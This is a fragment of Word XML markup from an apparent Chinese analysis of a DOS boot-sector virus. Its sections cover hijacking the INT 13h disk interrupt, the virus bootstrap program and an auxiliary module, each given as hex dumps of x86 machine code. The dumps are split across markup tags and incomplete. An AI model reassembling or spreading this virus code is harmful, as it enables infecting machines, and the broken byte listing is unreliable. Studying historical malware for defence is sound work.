          <w:attr w:name="SourceValue" w:val="3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3 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4 B8 88 00 06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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0050  50 CB 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、盗用中断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="850" w:firstLine="1530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 xml:space="preserve">1E </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="50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50 F</w:t>
        </w:r>
      </w:smartTag>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="6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6 C</w:t>
        </w:r>
      </w:smartTag>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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2 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 75-28 D0 EC FE CC 75 22 33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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="60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0060  C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 8E D</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="8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8 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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6C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 04 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> C4-2E 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2A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 06 03 00 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3C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 72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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:0070  10 2E 88 26 03 00 3D 02-00 73 03 E8 CC 00 E8 E8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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0080  00 58 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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1F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2E FF 2E 07 00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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、病毒自举主程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="1750" w:firstLine="3150"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="33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33 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0 8E C0 CD 13 0E </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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1F</w:t>
        </w:r>
      </w:smartTag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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0090  80 3E 0B 00 00 74 24 BE-AE 01 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="83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83 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 10 80 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3C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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00A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0  </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="75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75 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8 8B 14 8B </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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4C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02 BB-00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="7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7C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> B8 01 02 CD 13 72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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:00B0  D7 2E C7 06 48 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="1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01 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 07-EB 7B 90 B2 80 E</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="8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8 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9 00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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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00C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0  BF 18 00 8B </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="45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45 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9 B9 04-00 D3 E8 8B E8 8B 45 FE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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:00D0  D1 E0 40 03 E</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="8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8 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 35 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-CC FE C1 33 D2 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> F0 BB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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:00E0  00 05 B8 01 02 CD 13 72-F9 8B C5 BE 34 00 B7 07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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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00F</w:t>
        </w:r>
      </w:smartTag>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="0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0  F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 35 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="33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33 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">9 86 E1 2B F1-F6 75 02 8B D0 86 D5 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0100  05 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2A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> C1 FE C1 B4 02 50-CD 13 58 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="72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72 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8 B1 01 02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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>80:</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F"/>
          <w:attr w:name="SourceValue" w:val="110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0110  F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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02 F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8 8B 05 FE C6 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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3A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-75 02 72 04 B6 00 FE C5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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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lastRenderedPageBreak/>
          <w:t>9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0120  2B F0 73 E1 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="3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03 C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 B4 02-CD 13 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a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8A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6D FD 8B DD C7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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0130  06 48 01 70 00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C"/>
          <w:attr w:name="SourceValue" w:val="33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33 C</w:t>
        </w:r>
      </w:smartTag>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="0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0 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">2-0B 00 8E D8 B0 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="52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52 A</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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4C</w:t>
        </w:r>
      </w:smartTag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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0140  00 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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8C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0E 4E 00 EA 00 00-70 00 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>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、辅助模块</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="a"/>
          <w:attr w:name="SourceValue" w:val="14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014A</w:t>
        </w:r>
      </w:smartTag>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00F35590" w:rsidRDefault="006D66C3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ind w:firstLineChars="2050" w:firstLine="3690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>BB FF FF B0 B6 E6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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0150  43 89 D8 E6 42 88 E0 E6-42 E4 61 </w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="C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0C</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 03 E6 61 4B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smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="chmetcnv">
        <w:smartTagPr>
          <w:attr w:name="UnitName" w:val="F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9F</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80:0160  B9 64 00 E2 FE EB EA 5B-C3 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宋体" w:hAnsi="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
